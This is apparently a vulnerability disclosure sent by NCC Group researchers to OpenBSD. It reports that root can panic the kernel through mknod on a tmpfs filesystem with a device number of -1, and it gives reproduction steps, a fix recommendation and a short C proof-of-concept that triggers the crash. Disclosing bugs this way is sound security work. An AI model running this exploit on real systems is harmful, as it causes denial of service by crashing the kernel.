Hi, While fuzzing the openbsd system call interface we came across a low severity issue. The details are below in our proof-of-concept that includes a writeup with recommendations.
Tim & Jesse @ NCC Group ---- /* * tmpfs_mknod_panic.c: * Demonstrate a panic in tmpfs when performing mknod * * gcc -g tmpfs_mknod_panic.c -o tmpfs_mknod_panic */ #ifdef BUG_WRITEUP //--------------------------------------------------- Root can panic kernel with mknod on a tmpfs filesystem Impact: Root can panic the kernel. Description: When performing a mknod system call on a tmpfs filesystem, the tmpfs_alloc_node() function asserts that the rdev parameter is not VNOVAL (-1): /* Type-specific initialization. */ switch (nnode->tn_type) { case VBLK: case VCHR: /* Character/block special device. */ KASSERT(rdev != VNOVAL); nnode->tn_spec.tn_dev.tn_rdev = rdev; break; However, the value or rdev is never validated previous to this. Users that can perform mknod() calls on a tmpfs (i.e. root) can trigger this condition to panic the kernel. Reproduction: Compile the attached test program and execute it as root with a path to a non-existance filename on a tmpfs filesystem: # mount -o rw,-s16M -t tmpfs swap /mnt # gcc -g tmpfs_mknod_panic.c -o tmpfs_mknod_panic # ./tmpfs_mknod_panic /mnt/boom This should cause the kernel to panic in tmpfs_alloc_node(). Recommendation: Validate the device number vap->va_rdev in tmpfs_mknod() and return an error if it is VNOVAL (-1). Reported: 2016-07-05 Fixed: notyet #endif // BUG_WRITEUP --------------------------------------------------- #include <stdio.h> #include <sys/stat.h> int main(int argc, char **argv) { char *fn; int i, x; for(i = 1; i < argc; i++) { fn = argv[i]; x = mknod(fn, S_IFBLK | 0666, -1); if(x == -1) perror(fn); } printf("nothing happened!\n"); return 0; } -- Tim Newsham | www.thenewsh.com/~newsham | @newshtwit | thenewsh.blogspot.com